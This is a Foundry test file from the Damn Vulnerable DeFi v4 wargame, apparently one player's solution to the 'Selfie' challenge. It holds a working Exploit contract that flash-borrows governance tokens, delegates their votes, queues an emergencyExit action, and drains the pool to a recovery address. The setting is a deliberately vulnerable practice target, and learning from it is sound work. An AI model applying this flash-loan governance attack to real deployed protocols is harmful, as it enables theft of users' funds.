-
Notifications
You must be signed in to change notification settings - Fork 115
/
Selfie.t.sol
120 lines (99 loc) · 3.75 KB
/
Selfie.t.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
// SPDX-License-Identifier: MIT
// Damn Vulnerable DeFi v4 (https://damnvulnerabledefi.xyz)
pragma solidity =0.8.25;
import {Test, console} from "forge-std/Test.sol";
import {DamnValuableVotes} from "../../src/DamnValuableVotes.sol";
import {SimpleGovernance} from "../../src/selfie/SimpleGovernance.sol";
import {SelfiePool} from "../../src/selfie/SelfiePool.sol";
import {IERC3156FlashBorrower} from "@openzeppelin/contracts/interfaces/IERC3156FlashBorrower.sol";
contract SelfieChallenge is Test {
address deployer = makeAddr("deployer");
address player = makeAddr("player");
address recovery = makeAddr("recovery");
uint256 constant TOKEN_INITIAL_SUPPLY = 2_000_000e18;
uint256 constant TOKENS_IN_POOL = 1_500_000e18;
DamnValuableVotes token;
SimpleGovernance governance;
SelfiePool pool;
modifier checkSolvedByPlayer() {
vm.startPrank(player, player);
_;
vm.stopPrank();
_isSolved();
}
/**
* SETS UP CHALLENGE - DO NOT TOUCH
*/
function setUp() public {
startHoax(deployer);
// Deploy token
token = new DamnValuableVotes(TOKEN_INITIAL_SUPPLY);
// Deploy governance contract
governance = new SimpleGovernance(token);
// Deploy pool
pool = new SelfiePool(token, governance);
// Fund the pool
token.transfer(address(pool), TOKENS_IN_POOL);
vm.stopPrank();
}
/**
* VALIDATES INITIAL CONDITIONS - DO NOT TOUCH
*/
function test_assertInitialState() public view {
assertEq(address(pool.token()), address(token));
assertEq(address(pool.governance()), address(governance));
assertEq(token.balanceOf(address(pool)), TOKENS_IN_POOL);
assertEq(pool.maxFlashLoan(address(token)), TOKENS_IN_POOL);
assertEq(pool.flashFee(address(token), 0), 0);
}
/**
* CODE YOUR SOLUTION HERE
*/
function test_selfie() public checkSolvedByPlayer {
Exploit Attack=new Exploit(token,governance,pool,recovery);
Attack.attack();
}
/**
* CHECKS SUCCESS CONDITIONS - DO NOT TOUCH
*/
function _isSolved() private view {
// Player has taken all tokens from the pool
assertEq(token.balanceOf(address(pool)), 0, "Pool still has tokens");
assertEq(token.balanceOf(recovery), TOKENS_IN_POOL, "Not enough tokens in recovery account");
}
}
contract Exploit is IERC3156FlashBorrower,Test{
uint256 constant TOKEN_INITIAL_SUPPLY = 2_000_000e18;
uint256 constant TOKENS_IN_POOL = 1_500_000e18;
DamnValuableVotes token;
SimpleGovernance public governance;
SelfiePool public pool;
address public recovery;
constructor (DamnValuableVotes _token,SimpleGovernance _governance,SelfiePool _pool,address _recovery) {
token=_token;
governance=_governance;
pool=_pool;
recovery=_recovery;
}
function attack()public {
token.approve(address(pool),type(uint256).max);
pool.flashLoan(this, address(token), 1500000 ether,"0xx");
vm.warp(block.timestamp + 2 days);
governance.executeAction(1);
token.transfer(address(recovery),token.balanceOf(address(this)));
}
function onFlashLoan(
address initiator,
address token,
uint256 amount,
uint256 fee,
bytes calldata data
) public returns (bytes32){
console.log("token balance",DamnValuableVotes(token).balanceOf(address(this)));
DamnValuableVotes(token).delegate(address(this));
bytes memory datas=abi.encodeWithSignature("emergencyExit(address)", address(this));
governance.getVotingToken();
governance.queueAction(address(pool),0,datas);
return keccak256("ERC3156FlashBorrower.onFlashLoan");
}
}